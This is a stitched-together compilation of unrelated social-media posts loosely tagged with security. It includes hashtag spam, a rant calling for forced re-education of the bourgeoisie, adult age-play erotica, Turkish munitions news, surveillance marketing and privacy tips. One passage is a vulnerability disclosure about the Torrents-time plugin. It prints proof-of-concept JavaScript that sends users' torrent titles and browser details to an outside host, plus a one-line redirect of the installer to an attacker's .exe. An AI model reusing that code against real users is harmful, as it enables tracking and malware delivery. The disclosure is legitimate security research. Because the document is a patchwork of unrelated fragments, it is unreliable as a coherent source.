
Join us, link in bio #Worldie #iot #technology #internetofthings #arduino #tech #ai #raspberrypi #bi

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Join us, link in bio #Worldie #iot #technology #internetofthings #arduino #tech #ai #raspberrypi #bi

Join us, link in bio #Worldie #iot #technology #internetofthings #arduino #tech #ai #raspberrypi #bigdata #machinelearning #innovation #artificialintelligence #robotics #blockchain #electronics #engineering #business #smarthome #security #data #software #cybersecurity #esp #arduinoproject #o #g #automation #datascience #programming #cloud @motivatornetwork @_d_a_n_i_e_l__b (at Mountainside Cabins)

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Join us, link in bio #Worldie #iot #technology #internetofthings #arduino #tech #ai #raspberrypi #bi

Join us, link in bio #Worldie #iot #technology #internetofthings #arduino #tech #ai #raspberrypi #bigdata #machinelearning #innovation #artificialintelligence #robotics #blockchain #electronics #engineering #business #smarthome #security #data #software #cybersecurity #esp #arduinoproject #o #g #automation #datascience #programming #cloud @motivatornetwork @_d_a_n_i_e_l__b (at Appalation Trail Hot Springs NC)

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Join us, link in bio #Worldie #iot #technology #internetofthings #arduino #tech #ai #raspberrypi #bi

Join us, link in bio #Worldie #iot #technology #internetofthings #arduino #tech #ai #raspberrypi #bigdata #machinelearning #innovation #artificialintelligence #robotics #blockchain #electronics #engineering #business #smarthome #security #data #software #cybersecurity #esp #arduinoproject #o #g #automation #datascience #programming #cloud @motivatornetwork @_d_a_n_i_e_l__b (at Paint Creek / Cherokee NF)

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klaus-laserdisc:1980s Workplace Computer Precautionsklaus-laserdisc:1980s Workplace Computer Precautionsklaus-laserdisc:1980s Workplace Computer Precautionsklaus-laserdisc:1980s Workplace Computer Precautionsklaus-laserdisc:1980s Workplace Computer Precautionsklaus-laserdisc:1980s Workplace Computer Precautions


1980s Workplace Computer Precautions

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Robotic Falconry - Drone Catcher System for Removing the Intruding Drones

Drone capture systems got a lot of press in the last weeks. Japan’s Anti-Drone Squad for example uses a rigid mesh for catching drones:

anti drone

Above, you can see an american proof of concept prototype of a drone catcher system that intercepts and physically removes intruding multi-rotor drones from protected areas with a netgun.

This system offers a viable solution when force-landing or shooting the drones would jeopardize the safety. “If the threat is a drone, you really don’t want to shoot it down — it might contain explosives and blow up. What you want to do is catch it and get it out of there.”

Howsoever, the system is also capable of catching humans with their nets. So, happy man hunting.

[more at Michigan Tech]

#drones    #future    #anti drone systems    #security    #safety    

As per Homeland security, the biggest migrants spike in 20 years has been seen in the US

As per Homeland security, the biggest migrants spike in 20 years has been seen in the US

The United States is confronting the greatest flood of travelers at its southwestern boundary in 20 years, the country security secretary said on Tuesday as the Biden organization competitions to deal with an inrush of children attempting to cross the U.S.- Mexico line alone.
 Homeland Security Secretary Alejandro Mayorkas said that the number of undertaking to cross the border by individuals…

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Snowball inequality is a very disgusting stain on the concept of meritocracy in the United States. T

Snowball inequality is a very disgusting stain on the concept of meritocracy in the United States. The bourgeoisie are able to secure a good education through their accumulated wealth and network their children to universities and corporate internships through their personal connections whether it is through family or friends. This nepotism must be eradicated and instead the true proleteriat and peasant shall be prioritized for quality education. As a personal anecdote in my high school class, it is very disgusting how an average student was able to land an internship in UC Santa Barbara because their family member was a professor there. The existance of bourgeoisie nepotism is a direct action of class warfar, threatening the ability for the proletariat to secure a stable future in a capitalist society. This type of nepotism must be eradicated, and after the revolution the bourgeoisie must face mandatory re-education through the ministry of state security. The proletariat will rise and the homogenization of the bourgeoisie to the proletariat class will birth a nation with true equality, democracy, and meritocracy.

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Born and bread in the United Kingdom with a huge passion for programminganddevelopment whilst doing digital design and hibernating on social media!

This page will consist of random meme’s,jokesandspam that i find comical as well as preview pieces of client and personal graphics work. Follow this page and other social media listed to keep up with my messy life, Enjoy.

Remember that quick-witted 10th grade teacher who had awful style but knew just the way to simultane

Remember that quick-witted 10th grade teacher who had awful style but knew just the way to simultaneously put you in your place while making you look up to her? That’s exactly how I feel about the stern demeanor from security guards and their occasional fun-crushing in the name of something you respect, like art. (photo by Xavier Aaronson)

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It wasn’t regression. She knew that, as much as she knew it wasn't entirely normal. But this w

It wasn’t regression. She knew that, as much as she knew it wasn't entirely normal. But this wasn’t her retreating into childhood, trying to cling to innocence lost, finding herself safe and coddled among the circumstances that had her needs catered to, where the only thing she worried about was Hattie Bremner pushing her into the mud by the log during breaktime. 

That’s not what it was about, and that wasn’t why she hugged the bear when he looked at her with those eyes. It wasn’t about childhood, no matter what names they may or may not use with one another. On the surface of it, it was about the perversion, of using the roles in a way that was entirely inappropriate. That was the fun parts, that was what had lured her in. But it wasn’t why she stayed, and it wasn’t why she was clinging to a teddy like it was the last thing keeping him from ravaging her.

As if she didn’t want it. But then that was part of it, too.

From the outside, it sure as hell looked like regression, she knew. The way her tone of voice shifted, the way her mannerisms altered and warped, adopting the kind of persona that would cling to a bear like she was. But it wasn’t as if her thoughts were slipping backwards with everything else. She was still who she had always been, just… safer. That was the crux of it. 

She’d been submissive for three years, but it was only in these past two months that she’d felt completely comfortable about it. To have him look after her, to be able to step into the bedroom and entirely surrender, to surrender her adulthood along with the rest, to be able to shrug off the responsibilities that forced her to be responsible. It was relief that made her cling. It was safety that had made her stay. 

He beckoned with a finger. She shook her head, tucked her chin against the soft polyester of the bear’s fur. He smiled, rolled his eyes, and beckoned again. She grinned behind the stuffed toy.

He arched an eyebrow, and that finger curled a third time, slow as molasses. 

The bear fell to the ground, and bounced a few times. Before it was still she had made it across the room and onto his lap, damn near winding him.

He didn’t seem to mind.

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If I had ye gift of tongue
I would declare & do no wrong
Who ye are yt com by stealth
to impare my Masters welth

Detector Lock, made by John Wilkes, c.1680, Victoria and Albert Museum, London. The lock has a dial to show how many times the lock has been opened, alerting the owner if it was unlocked in his absence. Cocking the soldier’s hat locks the door quickly. The soldier’s leg kicks out to reveal the keyhole.

More information here: http://collections.vam.ac.uk/item/O78423/detector-lock-wilkes-john/
Video at: http://www.vam.ac.uk/content/videos/w/video-wilkes-detector-lock/

#detector lock    #soldier    #seventeenth century    #17th century    #security    #tell tale    #metalwork    #victoria and albert museum    #london    #museum    #display    #object    #visual culture    #birmingham    

What is Torrents-time

A “new” method of streaming torrents in your web browser, based around existing technologies Torrents-time was quickly adopted by a majority of torrent sites due to its ability to embed a player on the page to stream video content from torrents.

Tear down

Torrents-time bind the following ports

  • 8082:nodejs webserver
  • 12400:main application
  • 9220:web socket server

Exposed API

3rd parties being called (why would you do this)

  • 1337.to
  • moviedb
  • anonymousvpn

Profiting from VPN “partnership”, trusting a random VPN service is a writeup for another day.

Attack Vectors

This service stupidly abuses CORS, even worse it exposes a CORS enabled XHR object after requesting an instance of the plugin. So lets take advantage of that.

We don’t need anything more to do this attack than

<html> <title>Hello World</title> <head lang="en"> <script src="torrents.js"></script> <script src="https://localhost.ttconfig.xyz:12400/api.js"></script> <script src="attack.js"></script> <meta charset="UTF-8"> <title></title> </head> <body> </body> </html> 

Where torrents.js is their CDN code, once we have the first two scripts loaded attack.js can make use of all of torrentsTime useful functions on any page.

So in a few seconds we can get torrentTime on any HTML5 page, that’s great!

Except now I’m free to do a few things.

Concern 1 - Forced Piracy

Because I can make an invisible player, I’m free to force you to torrent whatever I like, even if you had no intention of streaming said content with a line of code


Great, you were just forced to torrent illegal content insecurely. You can do this for an unlimited amount of content. I can use any publisher ID as well.

Concern 2 - User Tracking/Privacy

Lets say I’m an advertiser/group with access to javascript on a website, with a few lines of code, not only can I tell who you are, I can send all that data using torrentsTime very exposed xhr object.

function driveBy() { //Torrents-time detected! //i0 is the first instance, loop over instances to get all currently started torrents var torrentTitle = torrentsTime.instances.i0.setup.title; var browser = torrentsTime.instances.i0.setup.browser; var filetype = torrentsTime.instances.i0.setup.fileType; //any other code we want to do on the page //this supports callback/JSONP //use the exposed xhr torrentsTime.utils.xhr("https://andrew.im/sandbox/tracktt.php?title=" + torrentTitle + "&browser=" + browser + "&filetype=" +filetype, callback); } function callback(data) { console.log(data); } 

Instant results

Concern 3 - Even more privacy issues

Every time you make a request to the CDN the following data is logged by Torrents-time servers

IP, location (country), user agent, cookies, and and likely the exact page you requested the CDN from. Further more within the C code you can see the use of private keys masking SOMETHING which does indeed make http request, I’ve yet to break this.

Concern 4 - It runs as root on OSX

It runs as root on OSX. I really don’t need to say more.

Concern 5 - Redirect Plugin DownloadX

Redirecting the download for the plugin is again only a single line of code torrentsTime.setup.installerURL.windows = "https://andrew.im/sandbox/torrentsTime-download.exe"; After that you just fire torrentsTime.downloadInstaller(); Or when a user clicks the plugin download, they will be greeted with a legit looking prompt

Of course the application isn’t the installer for the plugin, its your own application.

Concern 6 - XSS

Seems just about every site with TT installed is vunerable to XSS now.


Concern 7 - Sky rocket cpu usage/crash it

Literally just ping the server with 1024 bytes and the cpu usage stays between 50% and 80%, no idea why this one even occurs. Program later crashes when sending random strings, so possible bufferoverflow waiting to be exploited.

Concern 8 - Bundled Certs

includes the private keys to their for ‘encrypted’ comms channel. Details here UPDATE their cert for localhost has been revoked.


You can download Torrents-time c-code here, as well as all the NODEJS used on your computer


Threat level

Seriously, remove this software from your computer, if you put it on your site, remove it, if you think about adding it, don’t. More exploits coming soon!

Even more info written by /u/thecodingdude can be found on Reddit


Andrew Sampson


P@ypal:[email protected]

    Hello loved ones. We need to cover June’s rent and our internet bill. We could really use some help. It’s hard to ask, but hopefully we’re seeing the end of a dark time soon! ~N is healing and able to move around the house, so ~C is going to be interviewing for a new job soon. Until we can get that security, we’d really appreciate helping us cover rent to stay housed.

   Anything will help us right now. Whether it be good thoughts, donations, or reblogs - everything helps! Thank you for being here for us, and continuing to give us all reasons to live!

From a friend: “I’m calling in at midnight. Don’t know where I am, but pretty sure

From a friend: “I’m calling in at midnight. Don’t know where I am, but pretty sure someone I can’t describe is getting shot and the suspect went to the left but I don’t know what that direction is. He was in a car but I can’t describe it. I can’t describe the suspect either but I’m pretty sure yes, he was black, white or Hispanic. I know he goes by "Taco”, but I don’t know what hes wearing. And no, I ain’t going near the person to see if they’re breathing or to try cpr. Oh and I wanna be anonymous!“ Smh, y'all got jokes!!!

Happy New Year my friends! I hope this is the best yet! Be safe, be smart, don’t drink and drive! DD or phone a friend. Gor those working, holla! Here till 0600. Batten down and let’s play "Were those gunshots or fireworks?”

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Shout out to my fire and EMS people too- couldn’t find a pic for you but you’re no less Shout out to my fire and EMS people too- couldn’t find a pic for you but you’re no less

Shout out to my fire and EMS people too- couldn’t find a pic for you but you’re no less appreciated. I hope you all stay safe and have a Happy Thanksgiving!

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Seriously though, shout out to the many beautiful, caring, intelligent, bad ass ladies of law enforc

Seriously though, shout out to the many beautiful, caring, intelligent, bad ass ladies of law enforcement.

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İnsansız hava araçlarının (İHA) vuruş gücünü artırmak için geliştirilen, yüksek harp başlığı etkinliği ve daha uzun menzil sunan MAM-T’nin ilk test atışları başarıyla tamamlandı.

Yerli ve milli olarak geliştirilen, ağırlık/etkinlik optimizasyonu yapılmış olan MAM-T; zırhlı ya da zırhsız araçlar, binalar ve su üstü hedeflerine karşı kullanılabiliyor. Küresel konumlama ve ataletsel navigasyon sistemleriyle (KKS/ANS) kabiliyetleri desteklenebilecek ara safha güdüm yeteneklerinin yanında, blok-1 konfigürasyonunda hareketli ve sabit hedeflere karşı yüksek hassasiyet sağlayan mühimmat ve yarı aktif lazer arayıcı başlığa sahip. MAM- T, insansız hava araçlarında 30+ km, hafif taarruz uçaklarında 60 km ve savaş uçaklarında 80 km’den uzun menzil ile karşımıza çıkıyor.


Test atışları başarıyla tamamlanan MAM-T mühimmatı hakkında bilgi veren Roketsan Genel Müdürü Murat İkinci şunları söyledi:

“Kısaca MAM olarak isimlendirdiğimiz Mini Akıllı Mühimmat ailemiz, geldiğimiz noktada dünyadaki muadillerinden çok daha önde bir konumda. İHA’larda görev süresini maksimuma çıkaran MAM ailemizin yeni üyesi MAM-T de yüksek harp başlığı kapasitesi ve yüksek menzil performansıyla, ülkemizin yeni tip İHA filosunu yine dünya standartlarının üzerinde bir etkinlik ve güce ulaştırmış olacak.

Türkiye, yerli ve milli kaynaklarıyla, farklı görevleri icra edebilecek kabiliyetlerle donatarak son teknolojiyle geliştirdiği insansız hava araçlarında, bugün artık küresel bir güç olmuş durumda. Yakın tarihte Türk Silahlı Kuvvetlerimiz (TSK) tarafından kullanılmaya başlaması planlanan AKINCI İHA platformunun kabiliyetleriyle uyumlu olarak geliştirdiğimiz MAM-T, daha yüksek etkinlik ve daha uzun menzil performansıyla göreve hazır olduğunu kanıtladı.

AKINCI İHA’nın 1. fazı için belirlenmiş olan teslimat takvimine paralel olarak, bu yılın içerisinde İHA ile beraber ilk mühimmat teslimatlarını yapmayı hedefliyoruz. Kalifikasyon ve diğer test faaliyetlerinin tamamlanmasının ardından, 2021’in ikinci yarısında tam kapasiteyle seri üretime geçmeyi öngörüyoruz.”

Alem-i Cihan


Bitdefender Antivirüs, koronavirüs salgını sırasında kullanıcıların sıklıkla karşılaştığı en büyük küresel siber tehditleri yayınladı. İşte kullanıcıların dikkat etmesi gereken 5 önemli bulgu!

Bitdefender tarafından yayınlanan 2020 Tüketici Tehdit Görünümü Raporu’na göre fidye yazılımı saldırıları, kötü amaçlı spam yazılımları ve mobil tehditlerde artış gözlendi. Siber korsanlar küresel çapta yaşanan salgınla birlikte ortaya çıkan korku ve toplumsal belirsizliklerden yararlanmak için yeni yöntemler üzerinde çalışıyorlar.

2020 Tüketici Tehdit Görünümü Raporu’na ait bulgular

1) Fidye yazılım saldırılarında büyük artış mevcut

Fidye yazılımı saldırıları dünya çapında hızla artıyor. Rapora göre bu tür saldırılar 2020'de, bir önceki yıla kıyasla yüzde 485 oranında arttı. 2020'nin ilk ve ikinci çeyreğindeki saldırılar tüm saldırıların %64'ünü oluştururken, 2019'un ilk iki çeyreğinden yüzde 19 daha fazlasını oluşturdu.

2) IoT cihazları tehlike oluşturuyor

Tescilli işletim sistemlerine sahip IoT cihazlar, tüketicilerin sahip olduklarının yüzde 34'ünü oluşturuyor ve tespit edilen tüm güvenlik açıklarının yüzde 96'sından sorumludur. Bitdefender raporunda 2019'a kıyasla akıllı TV güvenlik açıklarında yüzde 338'lik yüksek bir artış görüldü. Kullanıcıların cihazla gelen şifreleri değiştirmeleri ve güncellemeleri düzenli olarak yapmaları gerekiyor.

3) Kötü amaçlı uygulamaları yaymak için Android kullanılıyor

Kötü amaçlı yazılımları yaymak için Android kullanılıyor. Kullanıcıların birçoğu video konferansa akın edip Covid-19 hakkında bilgi ararken, siber suçlular kullanıcıları gözetlemek ve kişisel verileri çalmak için sahte uygulama indirme siteleri oluşturarak avantaj elde etti. Tespit edilen tüm Android kötü amaçlı yazılımlarının yüzde 35’i Android.Trojan.Agent ailesinden geliyor. Onu yüzde 10 ile Android.Trojan.Downloader ve yüzde 7 ile Android.Trojan.Banker izledi. 

4) Ağa bağlı depolama (NAS) cihazlarında güvenlik açığı bulunuyor

NAS cihazlarında bulunan güvenlik açıklarının sayısı 2019 yılına kıyasla yüzde 198 oranda arttı. NAS’la evlerde kullanılan en yaygın cihazlar arasında yer almasa da en fazla sayıda yamalanmamış güvenlik açığı içeren cihaz oldu.

5) İstenmeyen uygulamalar yükselişe geçti 

Potansiyel olarak istenmeyen uygulamalar (PUA), kendi başına kötü amaçlı olmasa da sistemleri yavaşlatarak, beklenmedik reklamlar görüntüleyerek ve hatta ek yazılımlar yükleyerek kullanıcı deneyimini etkileyebilir. Raporda 2020 yılında bir önceki yıla kıyasla yüzde 320 artış görülürken, üç aylık PUA dağıtım modelleri benzer kaldı ve uygulamalar tutarlı bir büyüme gösterdi.

Alem-i Cihan



SSL security, which has been available on the dashboard for a while, is now here for blogs. To turn it on, go to your blog settings and enable “Always serve blog over SSL.” Mmmmm, security. Check out our help docs for more info.

An update on this:

  • SSL is being turned on by default for all Tumblrs that use our Official theme on the web, except those with custom domains. Because, well…Optica is the default theme, and why shouldn’t secure be the default?
  • This change only affects the web, because the mobile apps already use SSL all the time for your safety.
  • We don’t recommend it, but if for some reason you need to disable SSL, you can do so via your blog settings on the web, by turning off the “Always serve blog over SSL” option.

Are Security Guards or Live Video Monitoring Better?

Security Guards Versus Live Video Monitoring USA

Alive video surveillance service handles everything about video surveillance, from installation to execution. Businesses that provide live video surveillance work with their commercial clients to build a solution that meets their goals and budget. Next, they instal and monitor real-time video surveillance equipment. Live monitoring offers real-time danger identification and action. Rapid reaction time raises the possibility of apprehending suspects who endanger the firm.

US Live Video Monitoring System Information

They both have advantages and disadvantages: Another possibility is to implement a mix of the two systems. But this can be costly. Generally, video surveillance delivers the highest ROI and the most security. The monthly charge is much cheaper than the expense of hiring a security officer. With time, the equipment pays for itself.

Practice shows that you can set a camera on your building site, in a warehouse, or on your land. This camera wirelessly sends footage to a real-time video surveillance centre. Highly trained security personnel regularly examine the system for possible activities. The many camera options include strobe lights to deter criminals, number plate recognition, and temperature sensors. These cameras have extra security functionalities.

Clearly, security personnel and CCTV costs are equivalent. 24-hour security was implemented in a shopping area at a monthly cost is $14,000, or $168,000 annually. The expense proved to be unaffordable. The store management requires a new security system. Management chose to instal video surveillance. The device cost $35,000, and there is a $2,000-per-month monitoring fee. Perform simple math. Video surveillance saves $8,000 against security personnel over four months. Security Guards Versus Live Video Monitoring USA


What Does It Take to Become a Security Guard?

Remote video surveillance security and video surveillance from US Live Video Monitoring Inc. for businesses, organisations, and government agencies.  Security Guards Versus Live Video Monitoring USA- Which is Better?

Remote video surveillance security allows you to better protect your property, as you no longer need an on-site security guard.

Surprised to learn that security guards outnumber sworn, professional law enforcement officers? Over 900,000 people serve as law enforcement personnel in the United States.

Communicating with neighbours via home security systems helps ensure the community’s safety. neighbourhood watch’s objective is not to patrol the streets and hold meetings. Instead, neighbours are likely to use safety applications and use similar social networks focused on neighbourhood safety. Proactive efforts to safeguard property are equally important for individuals in every community. A good start to secure not just your home and assets but also those you care about is to have a security assessment done on your house, adopt common-sense improvements, and invest in an alarm system.

Merchants in the United States lost $46.8 billion in inventory in 2017 thanks to shoplifters and dishonest employees. Video surveillance systems aid retailers by helping them minimise losses and increase profits. Video surveillance services outperform unmanned surveillance cameras in detecting threats in real-time. You’ll have an easier time tracking down criminals when they’ve left the scene if you capture them first.  Security Guards Vs. Live Video Monitoring USA

How Live Video Monitoring Became a Viable Security Option

24/7 video event monitoring outsources security and asset protection to experts.
Intelligent IP cameras with artificial intelligence scan areas for activity and alert when activated.
From our US video security centre, respond to issues in real-time.

Actively improve on existing security—when required, deploy resources flexibly.

Receive quote requests.  Security Guards Vs. Live Video Monitoring USA

Video footage can’t be used after an incidence of vandalism on your property. In lieu of that, our pole and trailer security camera systems enable for live and real-time monitoring, with video footage routed to our security monitoring station, where qualified security professionals physically evaluate criminal activities and alert you of security breaches. You have additional photographic evidence of criminal behaviour to aid in police investigation and conviction.


Security Guards Vs. Live Video Monitoring

For less than the cost of security guards, you can have a year’s worth of video surveillance footage. Video surveillance cameras capture everything. The footage supplies the proof. Suspects are commonly caught prior to their departure. When they are released, recordings aid in the apprehension of suspects. The process of training is done entirely by machine. All cameras are monitored by security operators stationed away from the site. They will be safe.

Losses for stores due to shoplifting and dishonest staff cost the United States $46 billion in 2018. This helps merchants, like yours, to reduce losses and protect their profits. In addition, video surveillance systems can uncover sweethearting, which typically goes unnoticed by managers and security professionals. Store staff engage in sweethearting by neglecting to scan items or discounting them for their relatives and friends.

Accessible remote security camera monitoring service provided by authorised private security 24/7 live video monitoring for home and business surveillance.

Referred to as a remote guard replacement. We provide 24/7 live video surveillance, saving you up to 70% on on-site security guard expenditures.

Advanced system, simple use – Security Guards Versus Live Video Monitoring USA Which is the Best Option?

Modern day security cameras have high-resolution cameras. Some even have night vision capabilities.

When an alarm is activated, basic security cameras take photos which can help you and authorities identify a prowler or burglar. Indoor and outdoor video surveillance cameras may be used to secure your entire property. Efficiency can be boosted by only recording when motion is detected. Owners may remotely monitor and operate their cameras. Video clips can be stored online via an SD card.

Security you can count on

Security Best Practices

Voice control is increasingly common in American households. Experts warn that businesses that embrace voice control will inevitably become obsolete.

Residential security systems legislation are crucial to understanding. Confirm your jurisdiction’s compliance. There are other constraints as well, such as whether or not the gadget is able to record audio. Conversations in one’s own home may be captured under federal and state wiretapping legislation.

The CISO is a senior management position, and one of the most well-compensated jobs in the security business. They oversee the organization’s cybersecurity strategy and procedures. they are responsible for protecting an organization’s information technology framework, data, assets, and hardware


  • Additionally, US Live Video Monitoring has its own data centre on-site. We maintain a three-tiered data backup scheme.
  • This comprises four sectors: Raid Storage – LTO Tape Drive – Secondary Data Center – AWS Cloud.
  • We offer Dual fibre connection, which is backed up by our Sat-linkTM system.
  • We will not jeopardise your security or financial resources in the case of a catastrophic incident.
  • Our competitors’ data centres and monitoring centres are located in the exact location.
  • We have redundancy by separating our primary data centre, secondary data centre, monitoring centre 1, monitoring centre 2, and corporate headquarters.
  • Five distinct locations are all connected by a fibre optic Ethernet backbone.
  • Additionally, see the Redundancy section of this page for information on other significant redundancy programmes.

Video management

This solution has event and occurrence monitoring, automation of the environment, and also alarm management features. One system, trustworthy, straightforward, and simple to configure and run. LPR module (LPR)
Fully comprehensive automatic licence plate reader solution, including automated alarms, warnings, pre-configuration actions, statistics graphs, and third-party connectivity.

Capture, remote control, and record Windows computer screens. ideal for call centres, headless server control, and management of third-party software

The disadvantage of remote video monitoring is that the gadget may malfunction. Ineffectiveness makes your property vulnerable. Whenever picking a new security system for your company, research malfunctions and power outages. To avoid system failure, seasoned suppliers have backup measures in place. Therefore, the selected provider must give a system health check service.

surveillance camera cctv

Live Video Monitoring and Surveillance

Advanced analysis of video
Preventive measures such as automatic event and alert production as well as essential statistical data for business intelligence applications are provided without the requirement for video surveillance.

Mobile monitoring

Transform your Android or iOS device into a mobile camera with in-built real-time streaming to a monitoring centre.

Reports and videos of incidences that occur during surveillance hours will be sent.

This surveillance DVR has eight HD cameras, CIF real-time recording, remote network monitoring, software, eight-channel simultaneous playback, a 500GB hard drive, and a USB mouse control.

This study tries to discover and identify privacy issues consumers may face in the future. To read more about these themes, readers can turn to various government organisations, public interest groups, and companies.

Bio-Identification Technology – The secret surveillance of thousands of football fans during the 2001 Super Bowl in Tampa, Florida, made people aware of “biometric facial recognition.”

Live Video Monitoring Solutions – Security Guards Versus Live Video Monitoring USA

Housing communities use security guards, although these tend to be costly and give only a limited amount of coverage. Additional causes include a lack of training and faith in security officers’ abilities.

Remote video surveillance uses IP cameras. IP cameras have high-resolution digital image sensors, an integrated web server, DVR storage, video analytics, a dual image sensor, Power-over-Ethernet connectivity, and low-power operation, making them perfect for remote industrial video monitoring. One or two image sensors are provided, combining day, night, zoom, and infrared imaging sensors. A smart IP camera design is able to support from one to n cameras. This camera’s built-in web server is great for integrating video monitoring systems.

SmartLiveView® and US Live Video Monitoring technologies are intricately linked. SLV analytics has shifted foundation-wise during the previous 15 years. It’s just a collection of embedded software instructions that our CCTV engine uses.

All other monitoring services outsource the processing of their alerts to third parties. They use the standard notification. All video material must be fed to server farms to eliminate false alerts. Naturally, these delays endanger your business and assets.

SLV adjusts the way NVR generates alarms, eliminating any false alarms. The existence of the SLEDVE has enabled USLVM agents to track and identify intruders on the premises as soon as they enter them.

Other systems use movement detection by noticing pixel change. SLV aggregates and classifies the movement, obviating the necessity for source error notices

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So if you lived in a society where you had to secure your communication in order to be yourself around others, here are the apps that could help you do that.

Signal let’s you securely text and make phone calls.

Onion Browser allows you to surf the web without leaving a trail.

Duck Duck Go isn’t super secure but it won’t record your searches like Google.

ProtonMail is a email client that lets you email other secure email accounts.

Periscope allows you to stream live video.

Semaphor is there so you can securely make group chat rooms.

American privacy laws allow you to use these all. So that’s pretty cool.

Because we’re currently living in the prologue of a cyberpunk dystopian novel, imma reblog this.

FYI the feds can crack Signal when they’re sufficiently motivated, which means the rest of these are probably also done. Not to say you shouldn’t use them–you should–but don’t go around thinking you’re immune to snooping.

True. These things delay, put up barriers that make you harder to follow and it takes more work and time to decrypt your messages.

That’s useful if you wanna pass on information that only needs to be hidden for a short time but if you need communication to stay secret forever no matter how hard the state tries, don’t use the internet at all. There is no encryption that is going to stay uncrackable forever.

pay attention to that last sentence. there’s a fallacy in thinking that if you lock something, it’s safe forever. in truth a lock is a deterrent, and anyone sufficiently determined will get through, it’s simply a matter of time and a lock makes it take longer.

think about what you want encrypted, and why, and what lengths you’re willing to go to, to keep it that way

When locking your phone use a pin, not your fingerprint or face. You’re pin is safe under the law, your fingerprint and face are not. Again, they are meant to delay things to keep you safer.

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